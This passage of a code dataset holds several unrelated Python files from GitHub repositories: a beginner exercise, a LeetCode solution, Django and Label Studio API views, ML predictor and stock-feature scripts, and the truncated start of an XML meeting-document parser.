finished_sandwiches:\n print(f'A {sandwich}')\n\n# 7-10. Dream Vacation: Write a program that polls users about their dream\n# vacation. Write a prompt similar to If you could visit one place in the\n# world, where would you go? Include a block of code that prints the results of\n# the poll.\nprint('\\n---\\n7-10\\n---\\n')\npolling_active = True\nresults = {}\n\nwhile polling_active:\n name = input(\"Please enter your name? \")\n destination = input(\"Where would you like to go? \")\n results[name] = destination\n\n next_up = input(\"Is there anyone else that would like to enter a location? \"\n \"(yes/no)\")\n if next_up == 'no':\n polling_active = False\n\nfor person in results.items():\n print(f\"{person[0]} would like to go to {person[1]}. \")\n","repo_name":"joshua-shorterivey/tutorial_python_crash_course","sub_path":"ch7_try_it_yourself.py","file_name":"ch7_try_it_yourself.py","file_ext":"py","file_size_in_byte":6362,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"38726760731","text":"from typing import List\n\n\nclass Solution:\n def jobScheduling(self, startTime: List[int], endTime: List[int], profit: List[int]) -> int:\n jobs = [(i, j, k) for i, j, k in zip(startTime, endTime, profit)]\n # print(jobs)\n jobs.sort(key=lambda x: x[0])\n # print(jobs)\n n = len(jobs)\n\n memo = [0 for i in range(len(jobs)+1)]\n\n def top_down_dp(jobs, idx):\n # Without memoization.\n if idx >= len(jobs):\n return 0\n\n if memo[idx] != 0:\n return memo[idx]\n\n next_job = len(jobs)\n l, r = idx, len(jobs)-1\n while l <= r:\n mid = (l+r)//2\n if jobs[mid][0] >= jobs[idx][1]:\n r = mid-1\n else:\n l = mid+1\n next_job = l\n\n res = max(\n # Skip the job at idx\n jobs[idx][2] + \\\n top_down_dp(jobs, next_job), top_down_dp(jobs, idx+1)\n )\n memo[idx] = res\n return res\n\n ans = top_down_dp(jobs, 0)\n # print(ans)\n return ans\n","repo_name":"Keval78/Programming_Solutions","sub_path":"LeetCode/Daily/1235 Maximum Profit in Job Scheduling.py","file_name":"1235 Maximum Profit in Job Scheduling.py","file_ext":"py","file_size_in_byte":1149,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"8074546920","text":"from django.http import HttpResponseRedirect\r\nfrom django.shortcuts import render\r\n\r\n# Create your views here.\r\nfrom django.urls import reverse\r\nfrom django.utils.decorators import method_decorator\r\nfrom django.views.decorators.csrf import csrf_protect\r\n\r\nfrom mainapp.models import Diary\r\n\r\n\r\ndef create_diary(request):\r\n\r\n # 처음으로 생성할 경우\r\n if request.method == \"POST\":\r\n print('hello')\r\n diary_img = request.FILES['diary_img']\r\n diary_content = request.POST.get('diary_content')\r\n diary_share_state = False\r\n\r\n diary = Diary()\r\n\r\n diary.diary_img = diary_img\r\n diary.diary_content = diary_content\r\n diary.diary_share_state = diary_share_state\r\n diary.save()\r\n\r\n return render(request, template_name='diaryapp/create.html', context={})\r\n\r\n if request.method == 'GET':\r\n print('get')\r\n return render(request, template_name='diaryapp/create.html', context={})\r\n\r\n else:\r\n print(\"no!\")\r\n return render(request, template_name='diaryapp/create.html', context={})\r\n\r\n","repo_name":"Team-Samkkingkkang/popoDiary_postgres","sub_path":"diaryapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1089,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"39243109014","text":"from convert_conllu import convert_conllu_file\nfrom process_output import export_list_to_file, get_expected_output_list, process_real_output_list\nfrom tokenizer_accuracy import get_tokenizer_accuracy, get_total_correct_token\n\n\n\n# Dataset list\ndatasets = [\"id_csui-ud-test\", \"id_gsd-ud-test\", \"id_pud-ud-test\"]\n\nprint(\"Result of Aksara Tokenizer\")\nprint(\"-\"*70)\n\nfor i in range(0, len(datasets)):\n # Print dataset name\n print(\"Dataset name: \" + datasets[i])\n\n # Get expected tokenizer output from a dataset file\n exp_output_result = get_expected_output_list(\n \"processed_file/expected_output_\" + datasets[i] + \".txt\")\n\n # Print total input of dataset\n print(\"Total input: \" + str(len(exp_output_result)))\n\n # Get real tokenizer output from a dataset file\n real_output_result = convert_conllu_file(\n \"output_tokenizer/output-aksara-input_\" + datasets[i] + \".txt.conllu\")\n\n # Process real tokenizer output\n real_output_result_processed = process_real_output_list(\n exp_output_result, real_output_result[1])\n\n total_token_list = len(exp_output_result)\n total_correct_token_list = 0\n total_token = 0\n total_correct_token = 0\n uncorrect_token_list = []\n\n for j in range(len(exp_output_result)):\n total_token_data = len(exp_output_result[j])\n total_token += total_token_data\n\n # Get total correct token of real ouput\n total_correct_token_data = get_total_correct_token(\n real_output_result_processed[j], exp_output_result[j])\n total_correct_token += total_correct_token_data\n\n # Check if output from tokenizer is correct\n if total_token_data == total_correct_token_data:\n total_correct_token_list += 1\n else:\n uncorrect_token_list.append(real_output_result_processed[j])\n\n # Print total token list of expected output and total correct token list of real output\n print(\"Total token list: \" + str(total_token_list))\n print(\"Total correct token list: \" + str(total_correct_token_list))\n\n # Print total token of expected output and total correct token of real output\n print(\"Total token: \" + str(total_token))\n print(\"Total correct token: \" + str(total_correct_token))\n\n # Get tokenizer accuracy\n accuracy = get_tokenizer_accuracy(total_correct_token, total_token)\n print(\"Tokenizer accuracy: \" + str(accuracy))\n\n # Export luncorrect token list to a file\n export_list_to_file(\n uncorrect_token_list,\n \"uncorrect_token/uncorrect-token-aksara-\" + datasets[i] + \".txt\")\n\n print(\"-\"*70)\n","repo_name":"shafiraputri01/nlp-tk1","sub_path":"process_output_aksara.py","file_name":"process_output_aksara.py","file_ext":"py","file_size_in_byte":2580,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72409348907","text":"import logging\nfrom rest_framework import status\nfrom django.urls import reverse\nfrom django.conf import settings\nfrom rest_framework.parsers import FormParser, JSONParser, MultiPartParser\nfrom rest_framework import generics\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom rest_framework.pagination import PageNumberPagination\n\nfrom drf_yasg.utils import swagger_auto_schema\nfrom drf_yasg import openapi\nfrom django.utils.decorators import method_decorator\nfrom django.conf import settings\n\nfrom label_studio.core.permissions import all_permissions, ViewClassPermission\nfrom label_studio.core.utils.common import get_object_with_check_and_log, bool_from_request\n\nfrom organizations.models import Organization\nfrom organizations.serializers import (\n OrganizationSerializer, OrganizationIdSerializer, OrganizationMemberUserSerializer, OrganizationInviteSerializer\n)\nfrom organizations.serializers import OrganizationCreatedSerializer\nfrom rest_framework.decorators import api_view\nfrom rest_framework.decorators import permission_classes\nfrom rest_framework.permissions import IsAuthenticated\n\n\nlogger = logging.getLogger(__name__)\n\n\n@method_decorator(name='get', decorator=swagger_auto_schema(\n tags=['Organizations'],\n operation_summary='List your organizations',\n operation_description=\"\"\"\n Return a list of the organizations you've created or that you have access to.\n \"\"\"\n ))\nclass OrganizationListAPI(generics.ListCreateAPIView):\n queryset = Organization.objects.all().order_by('-created_at')\n parser_classes = (JSONParser, FormParser, MultiPartParser)\n permission_required = ViewClassPermission(\n GET=all_permissions.organizations_view,\n PUT=all_permissions.organizations_change,\n POST=all_permissions.organizations_create,\n PATCH=all_permissions.organizations_change,\n DELETE=all_permissions.organizations_change,\n )\n serializer_class = OrganizationIdSerializer\n\n def get_object(self):\n org = get_object_with_check_and_log(self.request, Organization, pk=self.kwargs[self.lookup_field])\n self.check_object_permissions(self.request, org)\n return org\n\n # 获取已经关联用户的组织\n # def filter_queryset(self, queryset):\n # return queryset.filter(users=self.request.user).distinct()\n\n def get(self, request, *args, **kwargs):\n return super(OrganizationListAPI, self).get(request, *args, **kwargs)\n\n @swagger_auto_schema(auto_schema=None)\n def post(self, request, *args, **kwargs):\n data = request.POST.dict()\n if not data:\n data = request.data\n data['created_by'] = request.user.id\n serializer = OrganizationCreatedSerializer(data=data)\n # serializer = self.get_serializer(data=data)\n serializer.is_valid(raise_exception=True)\n self.perform_create(serializer)\n headers = self.get_success_headers(serializer.data)\n return Response(\n serializer.data, status=status.HTTP_201_CREATED, headers=headers\n )\n\n\nclass OrganizationMemberPagination(PageNumberPagination):\n page_size = 20\n page_size_query_param = 'page_size'\n\n def get_page_size(self, request):\n # emulate \"unlimited\" page_size\n if self.page_size_query_param in request.query_params and request.query_params[self.page_size_query_param] == '-1':\n return 1000000\n return super().get_page_size(request)\n\n\n@method_decorator(name='get', decorator=swagger_auto_schema(\n tags=['Organizations'],\n operation_summary='Get organization members list',\n operation_description='Retrieve a list of the organization members and their IDs.',\n manual_parameters=[\n openapi.Parameter(\n name='id',\n type=openapi.TYPE_INTEGER,\n in_=openapi.IN_PATH,\n description='A unique integer value identifying this organization.'),\n ],\n ))\nclass OrganizationMemberListAPI(generics.ListAPIView):\n\n parser_classes = (JSONParser, FormParser, MultiPartParser)\n permission_required = ViewClassPermission(\n GET=all_permissions.organizations_view,\n PUT=all_permissions.organizations_change,\n PATCH=all_permissions.organizations_change,\n DELETE=all_permissions.organizations_change,\n )\n serializer_class = OrganizationMemberUserSerializer\n pagination_class = OrganizationMemberPagination\n\n def get_serializer_context(self):\n return {\n 'contributed_to_projects': bool_from_request(self.request.GET, 'contributed_to_projects', False)\n }\n\n def get_queryset(self):\n org = generics.get_object_or_404(self.request.user.organizations, pk=self.kwargs[self.lookup_field])\n return org.members.order_by('user__username')\n\n\n@method_decorator(name='get', decorator=swagger_auto_schema(\n tags=['Organizations'],\n operation_summary=' Get organization settings',\n operation_description='Retrieve the settings for a specific organization by ID.'\n ))\n@method_decorator(name='patch', decorator=swagger_auto_schema(\n tags=['Organizations'],\n operation_summary='Update organization settings',\n operation_description='Update the settings for a specific organization by ID.'\n ))\nclass OrganizationAPI(generics.RetrieveUpdateAPIView, generics.DestroyAPIView):\n\n parser_classes = (JSONParser, FormParser, MultiPartParser)\n queryset = Organization.objects.all()\n permission_required = all_permissions.organizations_change\n serializer_class = OrganizationSerializer\n\n redirect_route = 'organizations-dashboard'\n redirect_kwarg = 'pk'\n\n def get_object(self):\n org = generics.get_object_or_404(self.queryset, pk=self.kwargs[\n self.lookup_field])\n self.check_object_permissions(self.request, org)\n return org\n\n def get(self, request, *args, **kwargs):\n return super(OrganizationAPI, self).get(request, *args, **kwargs)\n\n def patch(self, request, *args, **kwargs):\n # self.queryset = Organization.objects.filter(pk=kwargs.get('pk'))\n return super(OrganizationAPI, self).patch(request, *args, **kwargs)\n\n @swagger_auto_schema(auto_schema=None)\n def put(self, request, *args, **kwargs):\n return super(OrganizationAPI, self).put(request, *args, **kwargs)\n\n def delete(self, request, *args, **kwargs):\n instance = self.get_object()\n if instance.users.count() or instance.projects.count():\n return Response(\n status=status.HTTP_400_BAD_REQUEST,\n data=dict(error='组织有关联的用户或项目。')\n )\n return super(OrganizationListAPI, self).delete(request, *args, **kwargs)\n\n\n@method_decorator(name='get', decorator=swagger_auto_schema(\n tags=[\"Invites\"],\n operation_summary='Get organization invite link',\n operation_description='Get a link to use to invite a new member to an organization in Label Studio Enterprise.',\n responses={200: OrganizationInviteSerializer()}\n ))\nclass OrganizationInviteAPI(APIView):\n parser_classes = (JSONParser,)\n permission_required = all_permissions.organizations_change\n\n def get(self, request, *args, **kwargs):\n org = get_object_with_check_and_log(self.request, Organization, pk=request.user.active_organization_id)\n self.check_object_permissions(self.request, org)\n invite_url = '{}?token={}'.format(reverse('user-signup'), org.token)\n if hasattr(settings, 'FORCE_SCRIPT_NAME') and settings.FORCE_SCRIPT_NAME:\n invite_url = invite_url.replace(settings.FORCE_SCRIPT_NAME, '', 1)\n serializer = OrganizationInviteSerializer(data={'invite_url': invite_url, 'token': org.token})\n serializer.is_valid()\n return Response(serializer.data, status=200)\n\n\n@method_decorator(name='post', decorator=swagger_auto_schema(\n tags=[\"Invites\"],\n operation_summary='Reset organization token',\n operation_description='Reset the token used in the invitation link to invite someone to an organization.',\n responses={200: OrganizationInviteSerializer()}\n ))\nclass OrganizationResetTokenAPI(APIView):\n permission_required = all_permissions.organizations_invite\n parser_classes = (JSONParser,)\n\n def post(self, request, *args, **kwargs):\n org = request.user.active_organization\n org.reset_token()\n logger.debug(f'New token for organization {org.pk} is {org.token}')\n invite_url = '{}?token={}'.format(reverse('user-signup'), org.token)\n serializer = OrganizationInviteSerializer(data={'invite_url': invite_url, 'token': org.token})\n serializer.is_valid()\n return Response(serializer.data, status=201)\n\n\n\"\"\"\n\"\"\"\n\n\n@api_view(['GET'])\n@permission_classes([IsAuthenticated])\ndef organization_all(request):\n \"\"\"\n :param request:\n :return:\n \"\"\"\n data = request.data\n queryset = Organization.objects.values('id', 'title')\n return Response(data=list(queryset))\n\n\n@api_view(['PUT', 'PATCH'])\n@permission_classes([IsAuthenticated])\ndef organization_change(request):\n \"\"\"\n :param request:\n :return:\n \"\"\"\n data = request.POST.dict()\n if not data:\n data = request.data\n o_id = data.get('organization_id')\n if not o_id:\n return Response(\n status=status.HTTP_400_BAD_REQUEST, data=dict(error='必须传组织参数')\n )\n try:\n o_id = int(o_id)\n except Exception as e:\n logger.warning('organization_id: ', o_id, ' message:', str(e))\n return Response(\n status=status.HTTP_400_BAD_REQUEST, data=dict(error='组织参数是整型')\n )\n\n query = Organization.objects.filter(id=o_id).first()\n request.user.active_organization = query\n request.user.save()\n return Response(data=dict(message=f\"更新成{query.title}\"))","repo_name":"ClaytonWang/lable-studio","sub_path":"label_studio/organizations/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":9958,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22455895018","text":"import numpy as np\nfrom scipy import spatial\nfrom sklearn import ensemble, linear_model\nfrom sklearn.ensemble.tests.test_gradient_boosting import boston\n\nfrom datamanager import DataManager\nfrom copy import deepcopy\n\nimport matplotlib.pyplot as plt\nfrom itertools import islice\nfrom sklearn.metrics import mean_squared_error\n\nfrom sklearn.ensemble import GradientBoostingClassifier, GradientBoostingRegressor\n\nclass Predictor:\n\n\tdef __init__(self, training_data, test_data, validation_data,\n\t\t\t\t training_labels, test_labels, validation_labels, predictor_func, closeness_cutoff=None):\n\t\tself.training_data = training_data\n\t\tself.test_data = test_data\n\t\tself.validation_data = validation_data\n\t\tself.training_labels = training_labels\n\t\tself.test_labels = test_labels\n\t\tself.validation_labels = validation_labels\n\t\tself.predictor_func = predictor_func\n\t\tself.closeness_cuttoff = closeness_cutoff\n\n\tdef train(self):\n\t\tif self.predictor_func == \"BestMatchingCase\":\n\t\t\tpass\n\t\telif self.predictor_func[:len('Regression')] == \"Regression\":\n\t\t\treturn self.regressor()\n\t\telif self.predictor_func == 'GRBT':\n\t\t\treturn self.GRBT_classifier()\n\t\telse:\n\t\t\tprint(\"Didn't recognize predictor function: \"+self.predictor_func)\n\t\t\tprint('Use regresion')\n\t\t\treturn self.regressor()\n\t\treturn True\n\n\tdef regressor(self):\n\t\tif not self.has_data():\n\t\t\treturn False\n\t\t#if not (check_if_distinct_values(self.training_labels)):\n\t\t#\treturn False\n\t\t#if not (check_if_distinct_values(self.test_labels)):\n\t\t#\treturn False\n\n\t\t# multivariate input\n\t\tX = self.training_data\n\t\t# multivariate output\n\t\tY = self.training_labels\n\t\twhich_regressor = self.predictor_func[len('Regression'):]\n\t\tif (which_regressor == 'Lasso'):\n\t\t\t# Lasso\n\t\t\tself.clf = linear_model.Lasso()\n\t\telif (which_regressor == 'ElasticNet'):\n\t\t\t# ElasticNet\n\t\t\tself.clf = linear_model.ElasticNet()\n\t\telif (which_regressor == 'Linear'):\n\t\t\tself.clf = linear_model.LinearRegression()\n\t\telse:\n\t\t\tprint(\"Didnt recognize regressorfunction: \"+which_regressor+\". Run: Lasso\")\n\t\t\tself.clf = linear_model.Lasso()\n\t\tself.clf.fit(X, Y)\n\t\tself.clf.predict(self.test_data)\n\n\n\t\t#print(self.clf.coef_)\n\t\t#print(self.clf.score(self.test_data, self.test_labels))\n\t\treturn True\n\n\tdef regression_predict(self, case):\n\t\t#print(\"getting prediction\")\n\t\treturn self.clf.predict(case.reshape(1, -1))[0]\n\n\tdef GRBT_predict(self, case):\n\t\treturn self.est.predict(case.reshape(1, -1))\n\n\tdef has_data(self):\n\t\tif (type(self.test_data) == None or type(self.training_data) == None):\n\t\t\treturn False\n\t\tif (len(self.test_data) == 0):\n\t\t\treturn False\n\t\tif (len(self.training_data) < 2):\n\t\t\treturn False\n\t\treturn True\n\n\tdef GRBT_classifier(self):\n\t\tif self.has_data():\n\t\t\tpass\n\t\telse:\n\t\t\treturn False\n\t\tif check_if_distinct_values(self.training_labels):\n\t\t\tpass\n\t\telse:\n\t\t\treturn False\n\t\t# fit estimator\n\t\t#print('Length of training data:',len(self.training_data))\n\t\t#print('Length of training labels:',len(self.training_labels))\n\t\tself.est = GradientBoostingClassifier(n_estimators=200, max_depth=3) # depth 4-6\n\t\tself.est.fit(self.training_data, self.training_labels)\n\n\t\t# predict class labels\n\t\t#pred = self.est.predict(self.test_data)\n\n\t\t# score on test data (accuracy)\n\t\tacc = self.est.score(self.test_data, self.test_labels)\n\t\t#print('ACC: %.4f' % acc)\n\n\t\t# predict class probabilities\n\t\t#print(self.est.predict_proba(self.training_data)[0])\n\t\treturn True\n\n\tdef find_best_matching_case(self, case, station_status):\n\t\t# end_station must be same for all trip data\n\t\t\"\"\"if station_status != None:\n\t\t\tstations_that_have_capacity = []\n\t\t\tstations_that_have_capacity_labels = []\n\t\t\tfor i, data_point in enumerate(self.training_data):\n\t\t\t\tstation_number = self.training_labels[i]\n\t\t\t\tif (get_available_slots(station_status, station_number) > 0):\n\t\t\t\t\tstations_that_have_capacity.append(data_point)\n\t\t\t\t\tstations_that_have_capacity_labels.append(station_number)\n\t\t\t\t#original_tree = spatial.KDTree(self.training_data)\n\t\t\t\t#original_choice = original_tree.query(case)\n\t\t\t\t#tree = spatial.KDTree(stations_that_have_capacity)\n\t\t\t\t#best_case = tree.query(case)\n\t\t\t\t#if (best_case != original_choice):\n\t\t\t\t#\tprint(best_case, original_choice)\n\t\telse:\n\t\t\tprint('WARNING! station status is none')\n\t\t\tstations_that_have_capacity = self.training_data\n\t\t\tstations_that_have_capacity_labels = self.training_labels\n\t\tif (len(stations_that_have_capacity) < 2):\n\t\t\treturn -1, -1\"\"\"\n\t\tstations_that_have_capacity = self.training_data\n\t\tstations_that_have_capacity_labels = self.training_labels\n\n\t\ttree = spatial.KDTree(stations_that_have_capacity)\n\t\tbest_case = tree.query(case)\n\t\tdistance = best_case[0]\n\t\t#if (get_available_slots(station_status, best_case[1]) == 0):\n\t\t#\tprint(get_available_slots(station_status, best_case[1]), self.st[best_case[1]])\n\t\tif distance < self.closeness_cuttoff:# self.closeness_cuttoff:\n\t\t\treturn stations_that_have_capacity_labels[best_case[1]]\n\t\treturn [-1, -1]\n\n\tdef prediction_of_label_by_best_matching_case(self, case, station_status):\n\t\tbest_case_label = self.find_best_matching_case(case=case, station_status=station_status)\n\t\treturn best_case_label\n\n\tdef run_all_test_data(self):\n\t\thits_misses = [0, 0]\n\t\tfor i, case in enumerate(self.test_data):\n\t\t\t_, label_prediction= self.get_prediction(case=case)\n\t\t\tcorrect_label = self.test_labels[i]\n\t\t\t#print(label_prediction, correct_label)\n\t\t\tif label_prediction == correct_label:\n\t\t\t\thits_misses[0] += 1\n\t\t\telse:\n\t\t\t\thits_misses[1] += 1\n\t\tprint(\"Run all test_data for single user\")\n\t\tprint(hits_misses)\n\n\tdef get_prediction(self, case, station_status):\n\t\tif self.predictor_func == \"BestMatchingCase\":\n\t\t\treturn self.prediction_of_label_by_best_matching_case(\n\t\t\t\tcase=case, station_status=station_status)\n\t\telif self.predictor_func[:len('Regression')] == \"Regression\":\n\t\t\treturn self.regression_predict(case=case)\n\t\telif self.predictor_func == 'GRBT':\n\t\t\treturn self.GRBT_predict(case=case)\n\t\telse:\n\t\t\tprint(\"Didn't recognize predictor function: \"+self.predictor_func)\n\t\t\tprint(\"Using regression_prediction\")\n\t\t\treturn self.regression_predict(case=case)\n\n\tdef plot_data(self, x_plot, ground_truth_x_plot, figsize=(8, 5)):\n\t\tfig = plt.figure(figsize=figsize)\n\t\t#gt = plt.plot(x_plot, ground_truth(x_plot), alpha=0.4, label='ground truth')\n\n\t\t# plot training and testing data\n\t\tplt.scatter(self.training_data, self.training_labels, s=10, alpha=0.4)\n\t\tplt.scatter(self.test_data, self.test_labels, s=10, alpha=0.4, color='red')\n\t\tplt.xlim((0, 10))\n\t\tplt.ylabel('y')\n\t\tplt.xlabel('x')\n\ndef get_available_slots(station_status, station_number):\n\tif (station_number in station_status.keys()):\n\t\treturn station_status[station_number]\n\telse: return 0\n\n\ndef check_if_distinct_values(data):\n\tdata_0 = data[0]\n\tfor d in data:\n\t\tif d != data_0:\n\t\t\treturn True\n\treturn False\n\ndef ground_truth(data, labels):\n\treturn labels","repo_name":"jolohan/fordypningsprosjekt","sub_path":"predictor.py","file_name":"predictor.py","file_ext":"py","file_size_in_byte":6772,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30976994568","text":"from src.bcint.state_machine.instruction_processors.instruction_processor_base import InstructionProcessorBase\nfrom src.bcint.state_machine.func_frame import FuncFrame\nfrom src.bcint.state_machine.func_state import FuncState\nfrom src.bcint.state_machine.heap import Heap\nfrom src.bcint.state_machine.binary_comparer import BinaryComparer\n\n\nclass CompareOpProcessor(InstructionProcessorBase):\n\n def __init__(self, binary_comparer: BinaryComparer = None):\n if not binary_comparer:\n binary_comparer = BinaryComparer()\n self._binary_comparer = binary_comparer\n\n def execute(self, operand, func_frame: FuncFrame, func_state: FuncState, heap: Heap):\n value2 = func_frame.eval_stack.pop()\n value1 = func_frame.eval_stack.pop()\n comp_res = self._binary_comparer.compare(operand, value1, value2)\n func_frame.eval_stack.push(comp_res)\n\n @property\n def binary_comparer(self):\n return self._binary_comparer\n","repo_name":"hanlarmammadov/bcint","sub_path":"src/bcint/state_machine/instruction_processors/compare_op_processor.py","file_name":"compare_op_processor.py","file_ext":"py","file_size_in_byte":967,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"28776335060","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\nimport sys\nimport datetime\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.dates as mdates\nimport pandas as pd\nfrom price_db import retrieve_id_ticker\nfrom price_db import retrieve_daily_price\nfrom ind import *\n\n\n\"\"\"\nretrieve data from database and add some features\n\"\"\"\ndef make_dataset1(ticker, column_name, start_date, end_date):\n\n df_a = retrieve_daily_price(ticker, \n columns=('price_date', 'open_price','high_price','low_price', 'adj_close_price', 'volume'), \n start=start_date, end=end_date)\n ## df_a = retrieve_daily_price(ticker, columns=('price_date', 'Close'), start=start_date, end=end_date)\n ## moving_average(df_a, 15)\n df_a = momentum(df_a, 5, column_name)\n df_a = moving_average(df_a, 5, column_name)\n df_a = moving_average(df_a, 15, column_name)\n df_a = rate_of_change(df_a, 5, column_name)\n df_a = stochastic_oscillator_k(df_a, column_name)\n df_a = williams_r(df_a, 15, column_name)\n df_a = relative_strength_index(df_a, 15, column_name)\n df_a = price_volume_trend(df_a, 15, column_name)\n df_a.dropna(inplace=True)\n\n ##df_a = exponential_moving_average(df_a, 5, column_name)\n ##df_a = bollinger_bands(df_a, 5, column_name)\n ##print(df_a.shape[0], len(df_a.index))\n ##print(df_a.head())\n ##print(df_a.tail())\n return df_a\n\n\"\"\"\nbuild train/test data by 5 day lag, address change direction\n\"\"\"\ndef make_train_dir(df_a, column_name, prd, p_train_date, p_test_date):\n ## build the x_train and x_test\n r_X_train = df_a[(df_a.index < p_test_date) & (df_a.index >= p_train_date)]\n r_X_test = df_a[df_a.index >= p_test_date]\n \n # Create the \"Direction\" column (+1 or -1) indicating an up/down day\n tsret = pd.DataFrame(index=df_a.index)\n tsret[\"Today\"] = df_a[column_name].pct_change(periods=prd)*100.0\n tsret[\"Direction\"] = np.sign(tsret[\"Today\"])\n y = tsret[\"Direction\"]\n r_y_train = y[(y.index < p_test_date) & (y.index >= p_train_date)]\n #y_train.loc[y_train.index[0], 'Direction'] = 1\n r_y_train.fillna(1.0, inplace=True)\n r_y_test = y[y.index >= p_test_date]\n\n return (r_X_train, r_X_test, r_y_train, r_y_test)\n\n\"\"\"\nbuild train/test data by 5 day lag, address change percentage\n\"\"\"\ndef make_train_pct(df_a, column_name, prd, pct, p_train_date, p_test_date):\n ## build the x_train and x_test\n r_X_train = df_a[(df_a.index < p_test_date) & (df_a.index >= p_train_date)]\n r_X_test = df_a[df_a.index >= p_test_date]\n \n # Create the \"Direction\" column (+1 or -1) indicating an up/down day\n tsret = pd.DataFrame(index=df_a.index)\n tsret[\"Today\"] = df_a[column_name].pct_change(periods=prd)*100.0 - pct \n #tsret.to_csv(\"tsret2.csv\",float_format='%.3f')\n\n tsret[\"Direction\"] = np.sign(tsret[\"Today\"])\n y = tsret[\"Direction\"]\n r_y_train = y[(y.index < p_test_date) & (y.index >= p_train_date)]\n #y_train.loc[y_train.index[0], 'Direction'] = 1\n r_y_train.fillna(1.0, inplace=True)\n r_y_test = y[y.index >= p_test_date]\n\n return (r_X_train, r_X_test, r_y_train, r_y_test)\n\n\"\"\"\nbuild train/test data by 5 day lag, 0:no change 1:over 5% -1:under -5%\n\"\"\"\ndef make_train_3way(df_a, column_name, prd, pct, p_train_date, p_test_date):\n ## build the x_train and x_test\n r_X_train = df_a[(df_a.index < p_test_date) & (df_a.index >= p_train_date)]\n r_X_test = df_a[df_a.index >= p_test_date]\n \n # Create the \"Direction\" column (+1 or -1) indicating an up/down day\n tsret = pd.DataFrame(index=df_a.index)\n tsret[\"Today\"] = df_a[column_name].pct_change(periods=prd)*100.0 \n\n tsret[\"Direction\"] = np.sign(tsret[\"Today\"])\n\n i = 0\n while i < (len(tsret.index)-1):\n tsret.loc[tsret.index[i], 'Direction'] = 0\n if i >= prd:\n if (tsret.loc[tsret.index[i], 'Today'] >= pct):\n tsret.loc[tsret.index[i-prd], 'Direction'] = 1.0\n elif (tsret.loc[tsret.index[i], 'Today'] <= -pct):\n tsret.loc[tsret.index[i-prd], 'Direction'] = -1.0\n i = i + 1\n #tsret.to_csv(\"tsret2.csv\",float_format='%.3f')\n\n\n y = tsret[\"Direction\"]\n r_y_train = y[(y.index < p_test_date) & (y.index >= p_train_date)]\n #y_train.loc[y_train.index[0], 'Direction'] = 1\n r_y_train.fillna(1.0, inplace=True)\n r_y_test = y[y.index >= p_test_date]\n\n return (r_X_train, r_X_test, r_y_train, r_y_test)\n\nif __name__ == \"__main__\":\n column_name = 'adj_close_price'\n date1 = datetime.datetime(2008, 4, 1)\n date2 = datetime.datetime(2017, 5, 1)\n ## train_date = datetime.datetime(2008, 4, 22) # one day ahead\n train_date = datetime.datetime(2008, 4, 29) # 5 day ahead\n test_date = datetime.datetime(2016,1,1)\n sym_df = retrieve_id_ticker()\n\n df_a = make_dataset1(sym_df[\"ticker\"][1], column_name, date1, date2)\n ## build the x_train and x_test\n ## X_train, X_test, y_train, y_test = make_train_dir(df_a, column_name, 5, train_date, test_date)\n ## X_train, X_test, y_train, y_test = make_train_pct(df_a, column_name, 5, 5.5, train_date, test_date)\n ##X_train, X_test, y_train, y_test = make_train_3way(df_a, column_name, 5, 5.5, train_date, test_date)\n \n ##X_train.to_csv(\"xtrain.csv\",float_format='%.3f')\n ##X_test.to_csv(\"xtest.csv\",float_format='%.3f')\n ##y_train.to_csv(\"ytrain.csv\",float_format='%.3f')\n ##y_test.to_csv(\"ytest.csv\",float_format='%.3f')\n\n","repo_name":"cujeu/quantocean","sub_path":"src/make_data.py","file_name":"make_data.py","file_ext":"py","file_size_in_byte":5438,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"31166860051","text":"# -*- coding: utf-8 -*-\n\nimport datetime\nimport logging\nimport re\n\nimport pytz\nfrom lxml import etree\n\nfrom .document import Document\n\nRESOLUTION_MAP = {\n 'hyväksytty': 'accepted',\n 'arkistoitu': 'archived'\n}\n\nATTENDEE_MAP = {\n 'jäsenet': 'participant',\n 'ledamöter': 'participant',\n\n 'asiantuntija': 'expert',\n 'asiantuntijat': 'expert',\n\n 'muut': 'other',\n 'övriga': 'other'\n}\n\nLOCAL_TZ = pytz.timezone('Europe/Helsinki')\n\nLOG = logging.getLogger(__name__)\n\nGUID_REGEX = r'\\{([A-F0-9]{8}-(?:[A-F0-9]{4}-){3}[A-F0-9]{12})\\}'\n\ndef parse_xml(source, except_treshold=logging.CRITICAL):\n \"\"\"\n Parse given XML file to a document.\n\n :type source: file|str\n :param source: The XML file as a file object or a filename\n :type except_treshold: int\n :param except_treshold:\n Logging message threshold level. If a message with the given or\n any higher level is logged while parsing, then an exception is\n thrown.\n :raises ParseError: if there is an error in parsing\n :rtype: Document\n \"\"\"\n return XmlParser().parse(source, except_treshold)\n\n\ndef parse_guid(raw):\n \"\"\"\n Parse and validate GUIDs.\n\n :type raw: str\n :param raw:\n GUID in the format {123E4567-E89B-12D3-A456-426655440000}\n :rtype: str\n :return: GUID in the format 123e4567-e89b-12d3-a456-426655440000\n :raises ParseError: if the guid isn't in the specified format\n \"\"\"\n\n if raw is None:\n return None\n\n guid_match = re.fullmatch(GUID_REGEX, raw)\n if guid_match is not None:\n return guid_match.group(1).lower()\n else:\n raise ParseError(\"Invalid GUID format\")\n\n\nclass ParseError(Exception):\n pass\n\n\nDATE_RANGE_RX = re.compile(\n # Optional day prefix, e.g. 'Tiistai ' or ''\n r'(?:\\w+ )?'\n # Date, e.g. '29.8.2017' = GROUP 1\n r'(\\d{1,2}.\\d{1,2}.\\d{4})'\n # Optional clock word, e.g. 'kello ', 'klo ', 'klockan ', or ''\n r' (?:\\w+ 